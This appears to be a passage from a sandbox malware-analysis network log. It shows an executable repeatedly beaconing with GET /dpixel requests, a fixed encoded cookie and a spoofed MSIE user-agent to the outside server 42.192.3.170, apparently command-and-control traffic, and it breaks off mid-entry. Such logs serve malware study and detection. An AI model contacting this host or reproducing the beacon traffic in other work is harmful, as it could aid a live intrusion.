                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:05 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:05 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  37192.168.2.44984442.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:53:06 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:07 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:07 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  38192.168.2.44985642.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:53:09 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:09 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:09 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  39192.168.2.44986542.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:53:10 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:11 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:11 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  40192.168.2.44987942.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:53:12 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:13 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:13 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  41192.168.2.44989242.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:53:14 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:15 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:14 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  42192.168.2.44990542.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:53:16 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:16 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:16 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  43192.168.2.44991842.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:53:18 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:18 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:18 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  44192.168.2.44993042.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:53:20 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:20 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:20 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  45192.168.2.44994542.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:53:22 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:22 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:22 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  46192.168.2.44995742.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:53:24 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:24 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:24 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  47192.168.2.44996642.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:53:25 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:26 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:26 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  48192.168.2.44998242.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:53:27 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:28 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:28 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  49192.168.2.44999342.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:53:29 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:30 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:30 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  50192.168.2.45000542.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:53:31 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:32 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:32 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  51192.168.2.45001642.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:53:33 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:34 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:33 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  52192.168.2.45003042.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:53:35 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:36 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:35 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  53192.168.2.45003842.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:53:37 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:37 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:37 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  54192.168.2.45005242.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:53:39 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:39 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:39 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  55192.168.2.45005742.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:53:40 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:41 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:41 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  56192.168.2.45005842.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:53:42 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:43 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:43 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  57192.168.2.45005942.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:53:44 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:45 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:45 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  58192.168.2.45006042.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:53:46 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:47 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:46 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  59192.168.2.45006142.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:53:48 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:49 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:48 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  60192.168.2.45006242.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:53:50 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  61192.168.2.45006442.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:53:56 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:56 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:56 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  62192.168.2.45006542.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:53:58 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:58 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:58 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  63192.168.2.45006642.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:53:59 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:00 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:00 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  64192.168.2.45006742.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:54:01 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:02 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:02 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  65192.168.2.45006842.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:54:03 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:04 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:04 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  66192.168.2.45006942.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:54:05 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:06 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:06 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  67192.168.2.45007042.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
